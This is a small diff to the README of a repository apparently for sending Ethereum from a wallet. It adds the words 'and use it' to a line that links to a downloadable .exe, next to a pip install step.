prasangapokharel/Send-Ethereum-Wallet/README.md

 ```bash
 pip install -r requirements.txt
 ```
    OR

-Alternatively, you can directly download the .exe file from here [Download](https://www.pathau.com/download.php?snippet_id=048) .
+Alternatively, you can directly download the .exe file from here [Download](https://www.pathau.com/download.php?snippet_id=048) and use it.

 ## Features